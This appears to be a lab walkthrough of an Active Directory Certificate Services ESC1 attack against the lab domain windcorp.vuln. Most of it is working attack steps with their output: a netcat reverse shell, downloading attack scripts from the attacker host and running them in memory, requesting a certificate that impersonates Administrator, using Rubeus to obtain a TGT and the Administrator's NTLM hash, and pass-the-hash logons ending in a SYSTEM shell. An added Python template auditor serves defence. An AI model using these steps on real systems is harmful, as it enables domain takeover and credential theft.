Practical Rubeus binary for PKINIT: Certificate SAN Impersonation

PKINIT Overview

Public Key Cryptography for Initial Authentication (PKINIT) enables the use of public key cryptography in the initial authentication exchange of the Kerberos protocol; Microsoft also specifies the Windows implementation of PKINIT, which is what the Rubeus asktgt step below relies on.

Attack Path Overview

The core of the ESC1 exploitation technique relies on the attacker's ability to request a certificate while specifying an arbitrary Subject Alternative Name, effectively allowing impersonation of any domain principal including high-privileged accounts such as Domain Administrators.

During the attack execution, the certificate template was temporarily modified to enable smartcard authentication requirements and accept SAN specifications, a certificate was requested with "Administrator" as the SAN value, and the template was automatically rolled back to its original configuration to minimize forensic artifacts.

The issued certificate was then leveraged using PKINIT to authenticate as the Administrator account and obtain a Ticket Granting Ticket (TGT), which subsequently allowed extraction of the NTLM hash through Rubeus.

Practical Script Preparation

First we gain initial access as the user diegocruz, who at this point cannot log on over LDAP, SMB, WinRM, or anything else:

┌──(byt3n33dl3㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.40] from (UNKNOWN) [192.168.231.180] 51453
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\System32> whoami
whoami
windcorp\diegocruz

We have a shell as a regular user. With PowerView.ps1 loaded we can run the Rubeus.exe binary, but PowerView.ps1 also needs an extra tool named ADCS.ps1, which we have to modify slightly for this attack path because of the SAN handling.

These are the lines we need to update (lines 927-935) in ADCS.ps1:

}
else {
    # Use the SamAccountName as the target UPN: on this machine the
    # Administrator account's UserPrincipalName is set to an old domain
    $TargetUPN = $user.SamAccountName
    if(-not $TargetUPN)
    {
        Write-Warning "User $($Identity) does not have a UPN."
        $STOPERROR = $true
    }
}

This change is needed because of this particular (old) lab machine: ADCS.ps1 would otherwise break on a misconfiguration specific to it, namely that the UserPrincipalName of the Administrator account is set to an old domain.

After that we strip the UTF-8 byte order mark (BOM) from ADCS.ps1 with sed:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sed -i '1s/^\xEF\xBB\xBF//' ADCS.ps1

This vulnerability exists because of three concurrent misconfigurations on the template: it allows requesters to specify an arbitrary SAN (the ENROLLEE_SUPPLIES_SUBJECT flag is enabled); it includes Client Authentication as an extended key usage (EKU), which makes the issued certificate usable for Kerberos PKINIT authentication; and it grants low-privileged users either enrollment rights or write permissions that allow temporary template modification.
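As an added defensive check (not code from the original post), here is a Python audit of the three template conditions above; it also checks that no manager approval or authorized signature is required, which the standard ESC1 definition includes. It uses constructed template records carrying the real AD attribute names in place of an LDAP query.

```python
# Added example (not from the original post): audit pKICertificateTemplate records for the
# ESC1 conditions. Attribute names are the real AD schema names; the sample records are
# constructed for this example, not pulled from a domain.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag: requester sets the SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: CA manager must approve
AUTH_EKUS = {                            # EKU OIDs that make a certificate usable for PKINIT
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}
WRITE_RIGHTS = {"WriteDacl", "WriteOwner", "WriteProperty"}


def esc1_findings(t: dict) -> list[str]:
    """Return the ESC1 conditions a template meets; all four together mean it is exploitable."""
    findings = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("requester controls the SAN (ENROLLEE_SUPPLIES_SUBJECT)")
    ekus = set(t["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list also permits any usage
        findings.append("authentication EKU, certificate works for PKINIT")
    if t["msPKI-RA-Signature"] == 0 and not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval or authorized signature required")
    weak = sorted(p for p, r in t["acl"].items()
                  if p in LOW_PRIV and ("Enroll" in r or r & WRITE_RIGHTS))
    if weak:
        findings.append("low-privileged principals can enroll or edit: " + ", ".join(weak))
    return findings


def is_esc1(t: dict) -> bool:
    return len(esc1_findings(t)) == 4


# Constructed samples: one shaped like the post's "Web" template, and a hardened copy of it.
SAMPLE_TEMPLATES = [
    {"name": "Web", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.1"],
     "acl": {"Domain Users": {"Enroll"}, "Domain Admins": {"Enroll", "WriteDacl", "WriteOwner"}}},
    {"name": "Web-hardened", "msPKI-Certificate-Name-Flag": 0x0, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "acl": {"Domain Admins": {"Enroll", "WriteDacl", "WriteOwner"}}},
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(t["name"], "ESC1" if is_esc1(t) else "ok", esc1_findings(t))
```

On a real domain the same attributes are read from the pKICertificateTemplate objects under CN=Certificate Templates,CN=Public Key Services,CN=Services in the Configuration naming context, and a template edit and rollback like the one described above is recorded by the CA as events 4899 and 4900.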

Now let's see the tools we needed to launch:

┌──(byt3n33dl3㉿kali)-[~]
└─$ ls    
ADCS.ps1  PowerView.ps1  Rubeus.exe

Now we're ready!

Practical Attack and Execution

First we download Rubeus.exe into a non-sensitive directory:

iwr -uri http://10.10.14.40/Rubeus.exe -outfile Rubeus.exe

Followed by the PowerShell scripts PowerView.ps1 and ADCS.ps1, loaded straight into the session:

curl http://10.10.14.40/PowerView.ps1 | iex
curl http://10.10.14.40/ADCS.ps1 | iex

Assuming everything ran smoothly, the only file left on disk is the Rubeus binary:

PS C:\programdata> dir
dir


    Directory: C:\programdata


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        1/27/2026   5:47 AM                docker                                                                
d---s-        8/11/2021   1:07 PM                Microsoft                                                             
d-----        1/27/2026   5:45 AM                Package Cache                                                         
d-----        1/27/2026   6:13 AM                regid.1991-06.com.microsoft                                           
d-----        9/15/2018   9:19 AM                SoftwareDistribution                                                  
d-----         2/6/2021   6:31 AM                ssh                                                                   
d-----        2/25/2021   9:24 PM                USOPrivate                                                            
d-----         2/6/2021   6:31 AM                USOShared                                                             
d-----        7/17/2021   4:35 PM                VMware                                                                
-a----        1/27/2026   6:14 AM         474112 Rubeus.exe

With that in place we use Get-SmartCardCertificate to generate the certificate request and have the CA issue it, telling it which user we want the certificate for, which template to use, and that there is no physical smart card present:

Get-SmartCardCertificate -Identity Administrator -TemplateName Web -NoSmartCard -Verbose

Once that completes, the certificate shows up in the current user's store:

PS C:\programdata> gci cert:\currentuser\my -recurse
gci cert:\currentuser\my -recurse


   PSParentPath: Microsoft.PowerShell.Security\Certificate::currentuser\my

Thumbprint                                Subject                                                                      
----------                                -------                                                                      
43E4EFDB09714747AFBBD481E43C1497423CD8AD                                                                               


PS C:\programdata>

Now we just need to run Rubeus to request a TGT as Administrator; with /getcredentials it should also hand us the NTLM hash:

PS C:\programdata> .\Rubeus.exe asktgt /user:Administrator /getcredentials /certificate:43E4EFDB09714747AFBBD481E43C1497423CD8AD
.\Rubeus.exe asktgt /user:Administrator /getcredentials /certificate:43E4EFDB09714747AFBBD481E43C1497423CD8AD

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3 

[*] Action: Ask TGT

[*] Got domain: windcorp.vuln
[*] Using PKINIT with etype rc4_hmac and subject:  
[*] Building AS-REQ (w/ PKINIT preauth) for: 'windcorp.vuln\Administrator'
[*] Using domain controller: fe80::5419:94c0:a893:9ff%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):


  ServiceName              :  krbtgt/windcorp.vuln
  ServiceRealm             :  WINDCORP.VULN
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  WINDCORP.VULN
  StartTime                :  1/27/2026 6:25:53 AM
  EndTime                  :  1/27/2026 4:25:53 PM
  RenewTill                :  2/3/2026 6:25:53 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  ezI2E1ucjc7CjUFksZpUMQ==
  ASREP (key)              :  78AE79DE3DEC36F85960E0C5C2A0A3D6

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 3CCC18280610C6CA3156F995B5899E09
PS C:\programdata>

And now we have the NTLM hash of Administrator, 3CCC18280610C6CA3156F995B5899E09, which can be used to log on:

┌──(byt3n33dl3㉿kali)-[~]
└─$ netexec smb MS02.windcorp.vuln -u administrator -H 3CCC18280610C6CA3156F995B5899E09                 
SMB         192.168.231.180  445    MS02            [*] Windows 10 / Server 2019 Build 17763 x64 (name:MS02) (domain:windcorp.vuln) (signing:True) (SMBv1:False) 
SMB         192.168.231.180  445    MS02            [+] windcorp.vuln\administrator:3CCC18280610C6CA3156F995B5899E09 (Pwn3d!)
┌──(byt3n33dl3㉿kali)-[~]
└─$ psexec.py administrator@MS02.windcorp.vuln -hashes :3CCC18280610C6CA3156F995B5899E09                            
Impacket v0.14.0.dev0+20251107.4500.2f1d6eb2 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on MS02.windcorp.vuln.....
[*] Found writable share ADMIN$
[*] Uploading file iCguXMXv.exe
[*] Opening SVCManager on MS02.windcorp.vuln.....
[*] Creating service hSGO on MS02.windcorp.vuln.....
[*] Starting service hSGO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2114]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
MS02

Despite ESC1 having been publicly disclosed in 2021, approximately 40% of enterprise environments remain vulnerable, because remediation is manual and PKI activity is rarely monitored.

Shout Outs

Major props to some engineers making this possible:

Happy hacking!

Message me on Proton if you have further questions or suggestions.
